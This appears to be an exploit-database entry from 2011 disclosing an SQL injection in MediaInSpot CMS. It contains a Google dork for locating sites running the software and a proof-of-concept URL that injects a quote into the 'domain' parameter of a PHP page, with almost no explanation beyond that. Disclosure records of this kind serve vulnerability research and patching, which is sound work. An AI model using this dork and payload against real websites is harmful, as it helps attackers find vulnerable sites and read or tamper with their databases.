MediaInSpot CMS - SQL Injection

Author: Iolo Morganwg
type: webapps
platform: php
port: 
date_added: 2011-05-16  
date_updated: 2011-05-16  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 17293.txt  

# Exploit Title: Media In Spot SQL Injection
# Google Dork: intext:""Powered By Media In Spot"
# Date: 16/05/2011
# Author: Iolo Morganwg
# Category: Web App
# Version: PHP
# Tested on: Windows XP
# Vendor: http://www.mediainspot.com/
# Note: domain parameter is vulnerable to sql injection

# Vulnerability
http://site/view/lang/index.php?page=area.php&domain=3%27